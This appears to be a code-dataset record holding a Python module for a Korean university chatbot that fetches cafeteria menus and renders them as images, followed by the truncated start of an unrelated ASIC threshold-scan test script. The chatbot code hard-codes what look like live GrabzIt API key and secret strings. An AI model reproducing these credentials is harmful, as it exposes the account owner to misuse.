"MIT"
] | null | null | null |
cnuchatbot/chatbotapp/cnudata/cafeteria/cafeteria.py
|
ChanhyukPark-Tech/CnuChatBot
|
c204b7f037a7dc8a2ca7f398a84aae68df245327
|
[
"MIT"
] | null | null | null |
cnuchatbot/chatbotapp/cnudata/cafeteria/cafeteria.py
|
ChanhyukPark-Tech/CnuChatBot
|
c204b7f037a7dc8a2ca7f398a84aae68df245327
|
[
"MIT"
] | null | null | null |
from chatbotapp.cnudata.cafeteria.studenthall1_info import *
from chatbotapp.cnudata.cafeteria.food_court_time import *
from chatbotapp.cnudata.cafeteria.dorm_info import *
from chatbotapp.cnudata.cafeteria.new_studenthall2_info import *
from chatbotapp.common.variables.cafeteria import *
from chatbotapp.common.functions import *
from GrabzIt import GrabzItImageOptions
from GrabzIt import GrabzItClient
from datetime import datetime
import requests
import schedule
def get_entire_cafeteria_info():
    """Top-level cafeteria entry point: title text plus the standard quick replies."""
    base_answer = insert_text("충남대학교 학식 정보")
    return insert_multiple_reply(base_answer, cafeteriaNormalReplies)
def get_studenthall1_answer():
    """Student Hall 1 menu as an image answer with the standard quick replies."""
    image_answer = insert_image(studenthall1Image_BASE_URL, "img")
    return insert_multiple_reply(image_answer, cafeteriaNormalReplies)
def get_variousCafeteria_info():
    """Prompt the user to choose between the student and staff cafeterias."""
    prompt = insert_text("보고 싶은 식당을 선택해주세요")
    choices = [["학생", "학생"], ["교직원", "교직원"]]
    return insert_multiple_reply(prompt, choices)
# http://3.38.250.164/cnuchatbot/media/savedImage/123.png/
def get_variousCafeteria_answer(person):
    """Build one card per meal category pointing at the pre-rendered menu image.

    *person* selects the audience: "학생" (student) maps to category code
    CCS01.20; anything else falls back to the staff code CCS01.10.
    """
    # Default is staff ("교직원"); students get a different category code.
    category = "CCS01.20" if person == "학생" else "CCS01.10"
    image_url = "http://3.38.250.164/cnuchatbot/media/savedImage/{}-{}.png"
    answer = make_card(
        mealCategoryKoreans[0],
        "",
        image_url.format(category, mealCategory[0]),
    )
    # Remaining four meal categories are appended to the same carousel.
    for idx in range(1, 5):
        insert_card(
            answer,
            mealCategoryKoreans[idx],
            "",
            image_url.format(category, mealCategory[idx]),
        )
    return answer
def get_variousCafeteria_images():
    """Render every (audience, meal) cafeteria menu page to a PNG via GrabzIt.

    Posts each category combination to the cafeteria JSP endpoint, converts
    the returned HTML to an image with the GrabzIt service, and saves it
    under cnuchatbot/media/savedImage/<person>-<meal>.png for later reuse
    by the card-building answers.
    """
    # Logic that captures the cafeteria JSP pages as images.
    # NOTE(review): GrabzIt API credentials are hard-coded below — they
    # should be moved to configuration/environment variables.
    grabzIt = GrabzItClient.GrabzItClient(
        "N2Y5Yjg1ZTY5NGIzNDE5ZmIzYmM4OGQ0MGQwMDk1N2Y=",
        "Qz9LP1lkPz8GPz8QTDk/TGU/Pz8/PyQ/IC4xNT8EVD8=",
    )
    options = GrabzItImageOptions.GrabzItImageOptions()
    options.browserHeight = -1  # -1: auto-size to the rendered page
    options.format = "png"
    options.width = -1
    options.height = -1
    # personCategory / mealCategory come from module-level config imports.
    for person in personCategory:
        for meal in mealCategory:
            data = {"cafe_div_cd": person, "food_div_cd": meal, "langType": "1"}
            r = requests.post(
                variousCafeteria_BASE_URL,
                data=data,
                headers={"Content-Type": "application/x-www-form-urlencoded"},
            )
            grabzIt.HTMLToImage(r.text, options)
            # Then call the Save or SaveTo method
            grabzIt.SaveTo(
                "cnuchatbot/media/savedImage/{0}-{1}.png".format(person, meal)
            )
    # Return value is a placeholder text answer (the job is run for its
    # file-writing side effects, not its response).
    return insert_text("sad")
# Runs every Monday: refresh the cached cafeteria menu images.
schedule.every().monday.do(get_variousCafeteria_images)
def get_studenthall23_answer(name):
    """Return the Student Hall 2/3 menu answer for the named hall (thin wrapper)."""
    return get_studenthall23_answer_info(name)
def get_entire_time():
    """Return the full cafeteria opening-hours answer (thin wrapper)."""
    return entire_time()
def day_of_week_dorm(the_day_of_week_number):
    """Return the dorm-cafeteria answer for the weekday with the given number.

    Replaces the previous seven-branch if chain with a lookup over the
    Weekday enum (assumes Weekday values are distinct, which the chain
    relied on as well). Dispatches to day_of_week() with the matching
    member name.

    Raises:
        ValueError: if the number matches no Weekday member (the old code
            raised UnboundLocalError in that case).
    """
    for day in Weekday:
        if day.value == the_day_of_week_number:
            return day_of_week(day.name)
    raise ValueError(
        "unknown day-of-week number: %r" % (the_day_of_week_number,)
    )
# def get_monday_breakfast_menu():
# text = monday_dorm_menu("breakfast")
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "월요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
#
# def get_monday_lunch_menu():
# text = monday_dorm_menu("lunch")
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "월요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
#
# def get_monday_dinner_menu():
# text = monday_dorm_menu("dinner")
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "월요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
def get_entire_menu(when, the_day_of_week_number):
    """Return breakfast, lunch and dinner dorm menus for the given weekday.

    Parameters
    ----------
    when : kept only for interface compatibility — all three meals are
        always shown (the original ignored it the same way).
    the_day_of_week_number : weekday selector forwarded to dorm_menu().

    Cleanup: the large commented-out per-day reply block was removed and the
    repeated text concatenation / reply insertion collapsed into loops.
    Output text and quick replies are unchanged.
    """
    text = "\n".join(
        dorm_menu(meal, the_day_of_week_number)
        for meal in ("breakfast", "lunch", "dinner")
    )
    answer = insert_text(text)
    # Same two quick replies as before, in the same order.
    for label, payload in (("다른식당보기", "학식"), ("다른요일보기", "기숙사식당")):
        answer = insert_replies(answer, make_reply(label, payload))
    return answer
# print(get_entire_menu("breakfast",1))
#
# def get_monday_menu(when):
# text = monday_dorm_menu(when)
# answer = insert_text(text)
# reply = make_reply("다른시간보기", "월요일기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
#
#
# return answer
#
# def get_tuesday_menu(when):
# text = tuesday_dorm_menu(when)
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "화요일기숙사식당")
# answer = insert_replies(answer, reply)
# return answer
# # def get_tuesday_breakfast_menu():
# # text = tuesday_dorm_menu("breakfast")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "화요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_tuesday_lunch_menu():
# # text = tuesday_dorm_menu("lunch")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "화요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_tuesday_dinner_menu():
# # text = tuesday_dorm_menu("dinner")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "화요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
#
# def get_wednesday_menu(when):
# text = wednesday_dorm_menu(when)
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "수요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
#
# # def get_wednesday_breakfast_menu():
# # text = wednesday_dorm_menu("breakfast")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "수요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_wednesday_lunch_menu():
# # text = wednesday_dorm_menu("lunch")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "수요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_wednesday_dinner_menu():
# # text = wednesday_dorm_menu("dinner")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "수요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
#
# def get_thursday_menu(when):
# text = thursday_dorm_menu(when)
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "목요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
#
# # def get_thursday_breakfast_menu():
# # text = thursday_dorm_menu("breakfast")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "목요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_thursday_lunch_menu():
# # text = thursday_dorm_menu("lunch")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "목요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_thursday_dinner_menu():
# # text = thursday_dorm_menu("dinner")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "목요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
#
# def get_friday_menu(when):
# text = friday_dorm_menu(when)
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "금요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
# # def get_friday_breakfast_menu():
# # text = friday_dorm_menu("breakfast")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "금요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_friday_lunch_menu():
# # text = friday_dorm_menu("lunch")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "금요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_friday_dinner_menu():
# # text = friday_dorm_menu("dinner")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "금요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
#
#
# def get_saturday_menu(when):
# text = saturday_dorm_menu(when)
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "토요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
#
# # def get_saturday_breakfast_menu():
# # text = saturday_dorm_menu("breakfast")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "토요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_saturday_lunch_menu():
# # text = saturday_dorm_menu("lunch")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "토요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_saturday_dinner_menu():
# # text = saturday_dorm_menu("dinner")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "토요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_sunday_breakfast_menu():
# # text = sunday_dorm_menu("breakfast")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "일요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
#
# def get_sunday_menu(when):
# text = sunday_dorm_menu(when)
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "일요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
# def get_sunday_lunch_menu():
# text = sunday_dorm_menu("lunch")
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "일요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
#
# def get_sunday_dinner_menu():
# text = sunday_dorm_menu("dinner")
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "일요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
#
| 33.318637
| 80
| 0.640683
| 1,908
| 16,626
| 5.322851
| 0.084906
| 0.144151
| 0.1282
| 0.214159
| 0.822469
| 0.771859
| 0.754825
| 0.751477
| 0.747735
| 0.728436
| 0
| 0.005752
| 0.215807
| 16,626
| 498
| 81
| 33.385542
| 0.773201
| 0.698063
| 0
| 0.211538
| 0
| 0
| 0.105898
| 0.035746
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086538
| false
| 0
| 0.105769
| 0
| 0.278846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a1759a2c25ae32cd79edc55f45269fc1da552b9b
| 38,184
|
py
|
Python
|
software/scripts/SCurveNP.py
|
slaclab/atlas-chess2
|
2135a79e1b43bb404abc50aeabe50e577242aa45
|
[
"BSD-3-Clause-LBNL"
] | 1
|
2017-10-24T19:04:40.000Z
|
2017-10-24T19:04:40.000Z
|
software/scripts/SCurveNP.py
|
slaclab/atlas-chess2
|
2135a79e1b43bb404abc50aeabe50e577242aa45
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
software/scripts/SCurveNP.py
|
slaclab/atlas-chess2
|
2135a79e1b43bb404abc50aeabe50e577242aa45
|
[
"BSD-3-Clause-LBNL"
] | 3
|
2017-10-24T19:04:22.000Z
|
2020-12-13T00:13:32.000Z
|
####import ROOT as R
import numpy as np
import matplotlib #.pyplot as plt
import sys
import time
import re
import logging
# Generating log file
def logfile(logfilename):
logger=logging.getLogger()
LOG_FILE=logfilename
LOG_FORMAT="%(asctime)s : %(funcName)s: %(message)s"
logging.basicConfig(filename=LOG_FILE,level=logging.DEBUG, format=LOG_FORMAT)
return logger
#transfer the data
def load_chess2_data(filename):
for i in [2]:
file_data=open(sys.argv[1],'r')
for line in file_data.readlines():
if ('Shape' in line):
shape_hist=re.findall('\d+',line)
# print(len(shape_hist))
break
data_1d=np.loadtxt(sys.argv[1])
hists=data_1d.reshape(int(shape_hist[0]),int(shape_hist[1]),int(shape_hist[2]),int(shape_hist[3]))
return hists
def get_thresholds(filename):
    """Extract the raw threshold values recorded in a CHESS2 log file.

    Scans for a line containing 'thresholds (raw)', collects every integer
    on that line, then keeps collecting integers from following lines up to
    and including the line containing the closing ']'. Values are returned
    as a list of digit strings (same as the original regex output).

    Fixes: the original ignored its *filename* parameter and read
    sys.argv[1], never closed the file, and raised NameError when the
    marker line was absent (now returns an empty list).
    """
    thresholds = []
    collecting = False
    with open(filename, 'r') as file_data:
        for line in file_data:
            if 'thresholds (raw)' in line:
                # Marker line: (re)start collection with its own digits.
                thresholds = re.findall(r'\d+', line)
                collecting = True
                continue
            if collecting:
                thresholds.extend(re.findall(r'\d+', line))
                # The closing-bracket line is included, then we stop —
                # matching the original's extend-then-break behavior.
                if ']' in line:
                    break
    return thresholds
def makeSCurve(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root"):
    """Sweep threshold cuts pixel-by-pixel and record hit times per ASIC.

    For each pixel (default: the full 128x32 matrix), enables that pixel on
    all three CHESS2 ASIC controllers, then for each threshold in
    *thresholdCuts* sets the BLR DAC, waits for the comparator to settle,
    and performs *nCounts* charge-injection cycles. Each cycle appends the
    detected hit time (or -1.0 when no valid hit) for each of the three
    ASICs.

    Returns:
        allHists: a list with one [asic0, asic1, asic2] hit-time list per
        threshold per pixel, in sweep order.

    NOTE(review): *histFileName* is unused since the ROOT output (####
    lines) was disabled; kept for interface compatibility.
    """
    nColumns = 32
    nRows = 128
    allHists = []
    logging.info("Using makeCurve......")
    ####R.TH1.AddDirectory(R.kFALSE)
    # thresholdCuts = [0x7ce]
    # system.root.readConfig("chess2_config.yml") --- should be in the driver script
    #####tf = R.TFile(histFileName, "recreate")
    # Turn on one pixel at a time
    print("Disable all pixels")
    system.feb.Chess2Ctrl0.writeAllPixels(enable=0,chargeInj=0) #chargeInj should be 1 in this line and following 2 lines
    system.feb.Chess2Ctrl1.writeAllPixels(enable=0,chargeInj=0)
    system.feb.Chess2Ctrl2.writeAllPixels(enable=0,chargeInj=0)
    # Default to scanning every (row, col) of the pixel matrix.
    pixels = pixels if (pixels!=None) else [ (row,col) for row in range(nRows) for col in range(nColumns) ]
    for (row,col) in pixels:
        print("Pixel: (%i,%i)"%(row,col))
        system.feb.Chess2Ctrl0.writePixel(enable=1, chargeInj=1, col=col, row=row, trimI= 15) #chargeInj should be 0 in these 3 lines
        system.feb.Chess2Ctrl1.writePixel(enable=1, chargeInj=1, col=col, row=row, trimI= 15)
        system.feb.Chess2Ctrl2.writePixel(enable=1, chargeInj=1, col=col, row=row, trimI= 15)
        ####hists_row = [ R.TH1F("row_%i_%i_%i"%(i_asic,row,col),"",128,0,128) for i_asic in range(3) ]
        ####hists_col = [ R.TH1F("col_%i_%i_%i"%(i_asic,row,col),"",32,0,32) for i_asic in range(3) ]
        # One detected-row list and one detected-column list per ASIC.
        hists_row = [[], [], []]
        hists_col = [[], [], []]
        for threshold in thresholdCuts:
            ####hists = [ R.TH1F("deltaT_%i_%i_%i_%s"%(i_asic,row,col,hex(threshold)),"",100,0,1000) for i_asic in range(3) ] # deltaT in ns
            print("Thresholds (system.feb.dac.dacBLRRaw): ", hex(threshold))
            # One hit-time list per ASIC for this threshold.
            hists = [[], [], []]
            # system.feb.dac.dacPIXTHRaw.set(threshold)
            #system.feb.dac.dacBLRaw.set(threshold+608)
            system.feb.dac.dacBLRRaw.set(threshold)
            #system.feb.dac.dacBLRaw.set(threshold)
            # this delay seems to be very important to enable the comparitor inside the asic to settle. (smaller values tend to make this
            # tests to report wrong times
            time.sleep(2.0)
            system.readAll()
            for cnt in range(nCounts):
                #time.sleep(0.1)
                # start charge injection
                system.feb.memReg.chargInjStartEventReg.set(0)
                time.sleep(0.1)
                #system.feb.chargeInj.calPulseVar.set(1)
                system.readAll()
                # ASIC 0: record the detected position and hit time, or -1.0
                # as a "no hit" sentinel when the valid flag is not set.
                if system.feb.chargeInj.hitDetValid0._rawGet():
                    row_det = int(system.feb.chargeInj.hitDetRow0._rawGet())
                    col_det = int(system.feb.chargeInj.hitDetCol0._rawGet())
                    ####hists_row[0].Fill(row_det)
                    ####hists_col[0].Fill(col_det)
                    hists_row[0].append(row_det)
                    hists_col[0].append(col_det)
                    #if (row == row_det) and (col == col_det):
                    ####hists[0].Fill(float(system.feb.chargeInj.hitDetTime0._rawGet()))
                    hists[0].append(float(system.feb.chargeInj.hitDetTime0._rawGet()))
                    print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime0: ", float(system.feb.chargeInj.hitDetTime0._rawGet()))
                else:
                    hists[0].append(-1.0)
                # ASIC 1: same recording scheme.
                if system.feb.chargeInj.hitDetValid1._rawGet():
                    row_det = int(system.feb.chargeInj.hitDetRow1._rawGet())
                    col_det = int(system.feb.chargeInj.hitDetCol1._rawGet())
                    ####hists_row[1].Fill(row_det)
                    ####hists_col[1].Fill(col_det)
                    hists_row[1].append(row_det)
                    hists_col[1].append(col_det)
                    #if (row == row_det) and (col == col_det):
                    ####hists[1].Fill(float(system.feb.chargeInj.hitDetTime1._rawGet()))
                    hists[1].append(float(system.feb.chargeInj.hitDetTime1._rawGet()))
                    print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime1: ", float(system.feb.chargeInj.hitDetTime1._rawGet()))
                else:
                    hists[1].append(-1.0)
                # ASIC 2: same recording scheme.
                if system.feb.chargeInj.hitDetValid2._rawGet():
                    row_det = int(system.feb.chargeInj.hitDetRow2._rawGet())
                    col_det = int(system.feb.chargeInj.hitDetCol2._rawGet())
                    ####hists_row[2].Fill(row_det)
                    ####hists_col[2].Fill(col_det)
                    hists_row[2].append(row_det)
                    hists_col[2].append(col_det)
                    #if (row == row_det) and (col == col_det):
                    ####hists[2].Fill(float(system.feb.chargeInj.hitDetTime2._rawGet()))
                    hists[2].append(float(system.feb.chargeInj.hitDetTime2._rawGet()))
                    print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime2: ", float(system.feb.chargeInj.hitDetTime2._rawGet()))
                else:
                    hists[2].append(-1.0)
            allHists.append(hists)
            ####[ hist.Write() for hist in hists ]
            # for i in range(3):
            #     fig = matplotlib.figure()
            #     ax = fig.add_subplot(1, 1, 1)
            #     n, bins, patches = ax.hist(hists[i], bins=100, range=(0, 1000))
            #     ax.set_xlabel('Delta T in ns')
            #     ax.set_ylabel('Frequency')
            #     fig.savefig("plotDir/deltaT_%i_%i_%i_%s"%(i,row,col,hex(threshold)))
            #     fig.clf()
            ####[ print("... ASIC%i %f"%(i_h,hist.GetEntries())) for (i_h,hist) in enumerate(hists) ]
            # [ print("... ASIC%i %f"%(i_h,len(hist))) for (i_h,hist) in enumerate(hists) ]
        ####[ hist.Write() for hist in hists_row ]
        ####[ hist.Write() for hist in hists_col ]
        # for i in range(3):
        #     fig = matplotlib.figure()
        #     ax1 = fig.add_subplot(2, 1, 1)
        #     ax2 = fig.add_subplot(2, 1, 2)
        #     n, bins, patches = ax1.hist(hists_row[i], bins=128, range=(0, 128))
        #     ax1.set_xlabel('Row')
        #     ax1.set_ylabel('Frequency')
        #     n, bins, patches = ax2.hist(hists_col[i], bins=32, range=(0,32))
        #     ax2.set_xlabel('Column')
        #     ax2.set_ylabel('Frequency')
        #     fig.savefig("plotDir/asic_row_col_%i_%i_%i.png"%(i,row,col))
        #     fig.clf()
        # system.feb.Chess2Ctrl0.writePixel(enable=0, chargeInj=0, col=col, row=row)
        # system.feb.Chess2Ctrl1.writePixel(enable=0, chargeInj=0, col=col, row=row)
        # system.feb.Chess2Ctrl2.writePixel(enable=0, chargeInj=0, col=col, row=row)
    return allHists
# tf.Close()
""" The following test enables to test a set of pixels for all trim values.
The makeCalibCurveLoop function is called to implement the inner loops
for the set of pixels and for the thresholdCuts"""
def makeCalibCurve(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root"):
    """Run calibration-curve sweeps over a set of trim values.

    Disables all pixels on the three ASIC controllers, then for each trim
    value (currently only trim=7; the range(0,16,2) sweep is commented out)
    calls makeCalibCurveLoop with pixEnableLogic=1 / chargeInjLogic=0 and
    collects its result.

    Returns:
        allHists: one makeCalibCurveLoop result per trim value.
    """
    allHists = []
    pixEnableLogic = 1
    chargeInjLogic = 0
    logging.info("Using makeCalibCurve......")
    print("Disable all pixels")
    # "Disable" writes the logical complements of the enable/charge-inject
    # flags to every pixel.
    system.feb.Chess2Ctrl0.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
    system.feb.Chess2Ctrl1.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
    system.feb.Chess2Ctrl2.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
    #for trim in range(0,16,2):
    for trim in range(7,8):
        # pixEnableLogic = 1
        # chargeInjLogic = 1
        # print("Trim, pixEnableLogic, chargeInjLogic: (%i,%i, %i)"%(trim, pixEnableLogic, chargeInjLogic))
        # hists = makeCalibCurveLoop(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnableLogic, chargeInjLogic = chargeInjLogic, pixTrimI = trim)
        # allHists.append(hists)
        pixEnableLogic = 1
        chargeInjLogic = 0
        print("Trim, pixEnableLogic, chargeInjLogic: (%i,%i,%i)"%(trim, pixEnableLogic, chargeInjLogic))
        hists = makeCalibCurveLoop(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnableLogic, chargeInjLogic = chargeInjLogic, pixTrimI = trim)
        allHists.append(hists)
        # pixEnableLogic = 0
        # chargeInjLogic = 1
        # print("Trim, pixEnableLogic, chargeInjLogic: (%i,%i, %i)"%(trim, pixEnableLogic, chargeInjLogic))
        # hists = makeCalibCurveLoop(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnableLogic, chargeInjLogic = chargeInjLogic, pixTrimI = trim)
        # allHists.append(hists)
        # pixEnableLogic = 0
        # chargeInjLogic = 0
        # print("Trim, pixEnableLogic, chargeInjLogic: (%i,%i, %i)"%(trim, pixEnableLogic, chargeInjLogic))
        # hists = makeCalibCurveLoop(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnableLogic, chargeInjLogic = chargeInjLogic, pixTrimI = trim)
        # allHists.append(hists)
    return allHists
""" The following test specifies a single pixel memory configuration (pixEnableLogic,
chargeInjLogic and trim). The makeCalibCurveLoop function is called to implement
the inner loops for the set of pixels and for the thresholdCuts"""
def makeCalibCurve2(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root"):
    """Run a single calibration sweep with a fixed pixel configuration.

    Uses pixEnableLogic=1, chargeInjLogic=0, trim=15; disables all pixels
    on the three ASIC controllers and delegates the sweep to
    makeCalibCurveLoop.

    Returns:
        allHists: the list of sweep results (bug fix — the function
        previously fell off the end and returned None, unlike every other
        makeCalibCurve* variant).
    """
    allHists = []
    logging.info("Using makeCalibCurve2......")
    pixEnableLogic = 1
    chargeInjLogic = 0
    trim = 15
    print("Disable all pixels")
    system.feb.Chess2Ctrl0.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
    system.feb.Chess2Ctrl1.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
    system.feb.Chess2Ctrl2.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
    print("Trim, pixEnableLogic, chargeInjLogic: (%i,%i,%i)"%(trim, pixEnableLogic, chargeInjLogic))
    hists = makeCalibCurveLoop(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnableLogic, chargeInjLogic = chargeInjLogic, pixTrimI = trim)
    allHists.append(hists)
    return allHists
def makeCalibCurve3(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root"):
    """Run a single threshold sweep via makeCalibCurveLoopTH.

    Fixed configuration: pixEnable=1, chargeInj=0 (enabled), trim=7, with
    the charge-injection pulse width set to its maximum raw value. All
